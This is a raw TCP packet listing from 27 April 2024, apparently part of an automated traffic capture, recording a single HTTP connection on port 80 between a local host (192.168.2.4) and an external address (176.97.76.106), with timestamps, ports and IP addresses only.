Apr 27, 2024 00:46:06.651840925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651876926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.651917934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.651952028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652040958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652081013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652117014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652148962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652211905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652249098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652328968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652364969 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652404070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652436018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652508020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652545929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652584076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652616024 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652693033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652721882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652730942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652757883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652793884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652827978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652868986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652915001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.652940035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.652976036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653048992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653083086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653187037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653218031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653284073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653316975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653415918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653448105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653523922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653557062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653614998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653656960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653687000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653728962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653773069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653811932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653873920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653891087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653912067 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653923988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.653958082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.653995037 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654026031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654058933 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654099941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654139042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654170990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654207945 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654211998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654254913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654258013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654289961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654320955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654357910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.654400110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.654432058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.657840967 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.662684917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.662728071 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.662815094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.662853003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.782881021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.782902002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.782913923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.782984972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.782999992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783021927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783025026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783054113 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783056021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783073902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783097029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783121109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783155918 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783158064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783194065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783859968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783906937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783927917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783941984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.783963919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.783978939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784018993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784040928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784051895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784056902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784096003 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784118891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784518003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784555912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784579039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784622908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784696102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784714937 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784728050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784740925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784753084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784770966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784773111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784786940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784805059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784816027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784841061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784877062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.784904003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.784940004 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785002947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785020113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785036087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785037041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785057068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785058022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785069942 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785077095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785093069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785096884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785111904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785129070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785144091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785156012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785175085 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785192013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785218954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785254002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785305977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785337925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785345078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785371065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785409927 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785444975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785458088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785484076 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785512924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785526037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785547972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785564899 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785603046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785615921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785635948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785640955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785651922 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785671949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785718918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785732031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785742044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785758972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785769939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785783052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785785913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785820007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785851955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785883904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.785892010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785919905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.785990000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786001921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786012888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786031008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786046982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786055088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786068916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786089897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786093950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786115885 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786134005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786521912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786565065 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786616087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786655903 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786742926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786787033 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786845922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786875010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786890030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786904097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786909103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786950111 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.786978960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.786992073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787013054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787030935 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787081003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787092924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787111998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787123919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787133932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787137032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787158966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787159920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787173033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787178993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787193060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787205935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787215948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787239075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787241936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787256002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787276030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787287951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787297010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787327051 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787338972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787352085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787373066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787390947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787404060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787421942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787439108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787453890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787504911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787523985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787545919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787549973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787559032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787570000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787576914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787590981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787595034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787622929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787623882 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787636995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787657976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787662029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787682056 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787698984 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787699938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787738085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787758112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787760973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787776947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787792921 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787806988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787820101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787841082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787858009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787862062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787889004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787889957 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787921906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787956953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787978888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.787990093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.787995100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788012981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788014889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788033009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788048029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788399935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788436890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788474083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788486958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788500071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788506031 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788525105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788541079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788547993 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788564920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788577080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788587093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788598061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788614988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788641930 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788655043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788676023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788690090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788706064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788727999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788739920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788748026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788760900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788793087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788793087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788806915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788830042 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788844109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788855076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788877010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788894892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788912058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788927078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788944006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.788961887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.788976908 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789002895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789016008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789036036 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789036989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789053917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789056063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789071083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789076090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789087057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789105892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789139032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789177895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789215088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789230108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789248943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789261103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789269924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789295912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789323092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789359093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789366007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789385080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789403915 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789417982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789472103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789485931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789505959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789526939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789536953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789550066 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789567947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789597034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789602995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789630890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789632082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789665937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789674044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789685965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789705992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789724112 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:06.789747953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:06.789767027 CEST	80	49734	176.97.76.106	192.168.2.4
